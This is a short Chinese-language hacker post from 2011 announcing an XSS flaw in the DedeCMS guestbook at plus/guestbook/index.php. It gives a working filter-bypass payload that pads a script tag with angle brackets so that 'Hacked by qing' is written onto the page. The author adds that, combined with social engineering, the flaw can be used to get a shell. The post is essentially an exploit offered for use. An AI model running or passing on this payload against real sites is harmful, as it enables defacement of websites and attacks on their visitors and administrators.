By:hackqing
2011/9/5/8:58 dedecms 的 0day 又出来了,2011/9/5/8:58 dedecms 留言本 XSS 漏洞。
呵呵。其实只是xss,结合下社工还是可以拿shell的
plus/guestbook/index.php
>>>><<<><<><<><><><<<<<<script>function init() { document.write(\'Hacked by qing\');}window.onload = init;</script> ;<<<<<><<><><<
就可以绕过了……